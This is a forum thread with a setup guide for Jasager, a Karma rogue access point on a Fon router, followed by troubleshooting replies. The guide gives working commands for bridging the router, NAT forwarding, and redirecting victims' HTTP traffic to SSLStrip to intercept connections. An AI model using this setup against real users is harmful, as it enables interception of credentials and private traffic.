MK2: Updated Jasager Setup Guide

[Netshroud]

(I'm unsure as how how Step 1 works on a virgin Fon 2100. If it doesn't work, try the downgrading and patching to enabled redboot as mentioned in Darren's guide.)

Part 1: Flashing the Fon+

The first step to installing Jasager is to flash the Fon with the Jasager firmware, which can be found at Digininja’s site. (http://www.digininja.org/files/jasager_firmware_1.0.tar.bz2) To simplify the process, I’ll be using the nifty "Fon Flash" application at http://www.gargoyle-router.com/download.php

For some reason the Windows version failed to work for me (it was complaining about ARP sizes), so I used the Linux version off an Ubuntu 9.04 LiveCD. I haven’t tried the Windows version on anything other than Vista SP2 Business x64, so if it works for you, enjoy.

Untar the Jasager firmware to the directory of your choice, as well as the Fon Flash utility. For some reason Fon Flash failed to launch when I ran it from a Windows share, so I copied it to the desktop.

Next, run Fon Flash. If it complains about not finding interfaces, give it your password to sudo itself. Under Windows Vista/7, you probably need to run it with elevated privileges.

Make sure that the firmware type is set to "OpenWrt / Gargoyle", and select your Ethernet interface (if you have multiple ones, the one connected to the Fon). Point the Rootfs file to openwrt-atheros-root.squashfs, and the Kernel file to openwrt-atheros-xmlinux.lzma.

Next, open up a terminal. Make sure that your Ethernet interface is set to 192.168.0.254. Connect your system to the Fon’s LAN port via Ethernet. Disable any network manager you may have running. For Ubuntu, right-click on the network notification icon and uncheck "Enable Networking".

Switch back to the Fon Flash utility, and click "Flash Router Now!" Plug in the power to your Fon (or restart it), sit back and wait until you see the "Device flashed successfully" notification. This took about 15 minutes for me so go for a walk, read a book, or chat in #hakhouse.

Part 2: Configuring the Fon and network

Once the Fon is flashed, set your computer to an ip on the 192.168.1.0/24 range. Telnet into the Fon on 192.168.1.1. Run ‘passwd’ to set the root password, then disconnect.

SSH into the Fon. Accept the host key, and log in as root with your new password. First, you need to enable the wireless. The following commands will do this:

uci set wireless.wifi0.disabled=0 
uci commit wireless && wifi

Next, pick an IP range and IP Address for the Fon. I chose to use one on the private range 172.16-32.X.Y range, because my home network is on the 10. range, and a couple of places I want to demo it at use 192.168.

Execute the following commands to do as I did, and set the Fon to 172.20.0.2:

uci set network.lan.ipaddr=172.20.0.2
uci set network.lan.gateway=172.20.0.1
uci set network.lan.dns=10.10.0.1
uci commit network

(10.10.0.1 is my home router)

Also configure dnsmasq to give out the gateway IP and DNS servers. In /etc/config/dhcp, under the section config dhcp lan, add:

        list 'dhcp_option'      '3,172.20.0.1'
        list 'dhcp_option'      '6,10.10.0.1'

Reboot the fon (The command via ssh is 'reboot'). Change your IP to be on the Fon’s range, then SSH into its new IP address. Accept the host key.

Now we need to set up Internet access on the Fon. When running Jasager, your network setup will/should look like this:

Internet --> Router --> Computer --> Fon --> Victims

We need to configure the computer to share its internet connection with the Fon. Under Windows, just enable Internet Connection Sharing. Under Linux, execute:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

where eth0 is your internet-facing interface.

If you’re doing what I did, and using a Virtual Machine for Jasager, you need to give it 2 virtual interfaces. For VMware users, run vmnetcfg.exe (Found in C:\Program Files (x86)\VMware\VMware Workstation\ for me). Make sure that one vmnet is bridged to your internet interface, and one is bridged to your Ethernet/Fon interface.

If you can now ping google.com from the Fon, move on. If not, make sure you have done everything correctly.

Next, I had to edit /karma/www/cgi-bin/functions.rb on the Fon to bridge ath0 correctly. Unless you’re fluent in vi, I would recommend installing nano.

opkg update
opkg install libncurses nano

In functions.rb, underneath:

system("wlanconfig ath0 create wlandev wifi0 wlanmode master 2>&1 > /dev/null")

add:

system("sleep 1")
system("brctl addif br-lan ath0")

and replace:

system("ifconfig", "ath0", "10.1.1.1", "up")

with:

system("ifconfig", "ath0", "up")

Part 3 (Optional): Installing X-Wrt

The main reason I need X-Wrt was that I couldn’t figure out how to change the time zone without it. To install X-Wrt, simply run:

echo "src X-Wrt http://downloads.x-wrt.org/xwrt/kamikaze/8.09/atheros/packages" >> /etc/opkg.conf
opkg update
opkg install webif

Part 4: Running Jasager

Now connect over HTTP using your browser of choice to the Fon on port 1471. Log in with username "root" or "admin", and your root password. Click the big grey button, turn karma on, and wait for victims to get friendly with Jasager.

This is the script I use to share the internet on the Ubuntu VM, and start SSLStrip:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo ifconfig eth1 172.20.0.1 netmask 255.255.255.0
sudo dhclient eth0
python sslstrip-0.7/sslstrip.py -l 64123 -f sslstrip-0.7/lock.ico

Edited April 21, 2010 by Psychosis

[John Doeeee]

hi

i used windows 7 with FonFlash and the first time nothing happened i tried in Ubuntu but did't get Fonflash working

second tried in windows, he did it :D Device flashed successfully :D

then i set my ip to 192.168.1.2 and reboot the fon tried to telnet with telnet and putty but both did't work

and in Ipconfig the default gateway was empty

so how can i fix this?

thanks very much

[Netshroud]

In ipconfig the default gateway would be empty if you didn't set one when you set a static IP.

Can you ping 192.168.1.1?

Does it show up on a NMAP ping sweep?

Can you post a screenshot of your IP configuration?

[John Doeeee]

ping scan : time out

the namp scan says 0 host up

and here is a screen dump form my settings

settings

[Netshroud]

Wierd. Is the power on and the network cable connected properly?

[John Doeeee]

lol yes he has power and the kabel is as secure as can be

but for the record the only thing i did with this Fon is flash the Atheros chip

thas step 1 in your guide

and step 11* in the jasager guide

so OpenWRT is not installed on the fon

so wouldn't it be impossible to telnet to the fon ?

*i have a Fon 2201 firmware 1.1.1 Rc2 and i asked the forum how i should handle, they said i could start at step 11 of the jasager guide

so i did but step 11 is the same as your step 1 and thats flashing the atheros chip or something

step 12 is telnet over to the fon

Edited April 18, 2010 by GuyDols

[Netshroud]

Flashing it is installing OpenWRT (and Jasager and it's dependencies).

As ridiculous as it may sound, try flashing it again. I had a similar issue, and reflashing it fixed it.

[John Doeeee]

oke i will now retry it i will post when i'm done

[John Doeeee]

i flashed successfuly but can't telnet into it

i did an nmap range scan the only ip up is me :(

[John Doeeee]

i found out that when i start pinging and then plug the power in i get like 4 packets back and then it´s dead again

tried telnet and ssh

but i can get in to reboot with telnet on port 9000

do you know maby witch port i can test to

tried flashing it 3 times

[Netshroud]

Run a ping scan on 192.168.0.0/16, 10.0.0.0/8, and 172.16.0.0/12, see if it shows up at all.

(Remember to change your IP to be on the subnet you're scanning.)

[John Doeeee]

i did all the scan it took forever and did't find anything

but when i don't assign an ip i get this ip from the Fon

169.254.63.223

255.255.0.0

so i though i couldn't hurt if i scanned that subnet and that's wath i'm now doing i let you know when i find something

[Netshroud]

That's not an IP address you would get from the Fon, that's an autoconfiguration IP. Your OS would have assigned you that IP when it didn't get one from the fon.

Which leaves me confused. Is the image you flashed corrupt in any way? Are the lights on the fon flickering?

[John Doeeee]

when i plug the power in the power, internet and computer lights go on wireless not

after 1 sec internet and computer go off

then after 2 sec the internet starts flickering

then after 10 sec power and internet go off

and then internet starts flickering but power light is off

[John Doeeee]

maby you cuold email me the image that you that 100% works

Guy_dols@hotmail.com

ty

[gaud]

What is the MITM Fun VM you have, it sounds... fun :-)

[Netshroud]

maby you cuold email me the image that you that 100% works

Guy_dols@hotmail.com

ty

Just download it from http://www.digininja.org/jasager

Does anything work if you use the standard OpenWRT Kamikaze firmare? http://downloads.openwrt.org/kamikaze/8.09/atheros/

What is the MITM Fun VM you have, it sounds... fun :-)

It's the VM I use for MITM attacks (on other VMs). It's running Ubuntu 9.10, and has dsniff, wireshark, sslstrip, SET, middler (which I used once to have a look at), metasploit and a non-functional upside-down-ternet (current project).

[cooler]

Thanks for the guide, I followed your guide and everything worked fine, accept I've ran in to a strange problem.

There is no internet connection for the connected clients. When I ping google from fon, it reaches fine and when I ping google from connected clients it also reaches, but when opening any broswer no connection can be established. Using win7.

Whats could be the problem and how could I fix it?

P.S my internal ip for fon and pc is 192.168.1.1 range and my router and wlan0 is 192.168.120.1 range, and also using wlan0 substituted for eth0.

Edited April 20, 2010 by cooler

[Netshroud]

Is Windows 7 the ICS host / MITM, or the connected client / 'victim'? If it's the 'victim', what do you have running the ICS machine?

[cooler]

Is Windows 7 the ICS host / MITM, or the connected client / 'victim'? If it's the 'victim', what do you have running the ICS machine?

Hi, My ICS Machine is Ubuntu 8.10, the clients are running windows 7

On linux side I have ath0 with static ip connected to fon.

[Netshroud]

If you're not running SSLStrip (on port 64123), then:

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123

will cause all TCP traffic on port 80 (usually HTTP) to just get dropped. Run:

sudo iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123

to remove that rule.

[gaud]

I'd be interested to see your progress on the upside down. It is on my list of things to play with.

[Netshroud]

My progress is:

Everything should work.

Nothing does.

I'm confused.

[cooler]

If you're not running SSLStrip (on port 64123), then:

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123

will cause all TCP traffic on port 80 (usually HTTP) to just get dropped. Run:

sudo iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123

to remove that rule.

The above makes no difference, I've tried cross over cable too still no joy

[John Doeeee]

http://www.digininja.org/jasager[/url]

Does anything work if you use the standard OpenWRT Kamikaze firmare? http://downloads.openwrt.org/kamikaze/8.09/atheros/

i tried both but no telnet :(

and just for the record the WiFi light never flashes and it doesn't send out ssid anymore